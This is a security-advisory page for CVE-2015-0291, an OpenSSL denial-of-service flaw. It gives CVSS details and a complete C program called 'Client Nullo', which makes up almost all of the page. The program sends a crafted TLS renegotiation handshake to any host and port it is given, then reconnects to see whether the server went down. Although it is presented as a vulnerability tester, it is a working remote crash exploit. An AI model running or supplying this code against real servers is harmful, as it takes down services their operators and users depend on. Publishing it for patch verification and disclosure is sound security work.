OpenSSL DoS tester now available (CVE-2015-0291)

2015.03.22
Credit: mancha140
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2015-0291
CWE: CWE-Other


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

/* * Client Nullo * vulnerability tester for CVE-2015-0291 * by: mancha (twitter: @mancha140) * * $ gcc -o clientnullo clientnullo.c -lcrypto -lssl * $ ./clientnullo [host] [port] * */ #include <stdio.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <openssl/rand.h> #include <openssl/ssl.h> #include <openssl/err.h> #define do_error(m) { perror(m); exit(1); } #define do_ssl_error() { ERR_print_errors_fp(stderr); exit(1); } static char nullo[80] = { 0x01, 0x00, 0x00, 0x4c, 0x03, 0x03, 0x0c, 0x04, 0xe2, 0xd0, 0xe7, 0x72, 0xe2, 0x5b, 0x7f, 0x6d, 0x08, 0xc1, 0xa3, 0xd0, 0xcf, 0x61, 0x98, 0xff, 0xa3, 0xf4, 0x40, 0x81, 0x15, 0x5f, 0x6e, 0x58, 0x22, 0x0b, 0x5b, 0xfa, 0x03, 0x14, 0x00, 0x00, 0x02, 0x00, 0x2f, 0x01, 0x00, 0x00, 0x21, 0x00, 0x23, 0x00, 0x00, 0x00, 0x0d, 0x00, 0x08, 0x00, 0x06, 0x6d, 0x61, 0x6e, 0x63, 0x68, 0x61, 0xff, 0x01, 0x00, 0x0d, 0x0c }; int main(int argc, char **argv) { int sockfd; struct addrinfo hints, *results; SSL_CTX *ctx; SSL *ssl; if (argc != 3) { printf("Usage: %s [host] [service/port]\n", argv[0]); exit(1); } memset(&hints, 0, sizeof(hints)); hints.ai_family = AF_UNSPEC; hints.ai_socktype = SOCK_STREAM; if (getaddrinfo(argv[1], argv[2], &hints, &results)) { fprintf(stderr, "getaddrinfo error\n"); exit(1); } if ((sockfd = socket(results->ai_family, results->ai_socktype, results->ai_protocol)) == -1) do_error("socket"); if (connect(sockfd, results->ai_addr, results->ai_addrlen) == -1) do_error("connect"); SSL_load_error_strings(); SSL_library_init(); if (!(ctx = SSL_CTX_new(TLSv1_2_client_method()))) do_ssl_error(); if (!SSL_CTX_set_cipher_list(ctx, "AES128-SHA")) do_ssl_error(); if(!(ssl = SSL_new(ctx))) do_ssl_error(); if(!SSL_set_fd(ssl, sockfd)) do_ssl_error(); if(SSL_connect(ssl) != 1) do_ssl_error(); memcpy(&nullo[68], ssl->s3->previous_client_finished, 12); if (ssl3_write_bytes(ssl, SSL3_RT_HANDSHAKE, nullo, 80) <= 0) do_ssl_error(); SSL_shutdown(ssl); SSL_free(ssl); close(sockfd); SSL_CTX_free(ctx); sleep(2); sockfd = socket(results->ai_family, results->ai_socktype, results->ai_protocol); if (connect(sockfd, results->ai_addr, results->ai_addrlen) == -1) printf("VULNERABLE\n"); else printf("not vulnerable\n"); close(sockfd); freeaddrinfo(results); return 0; }


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top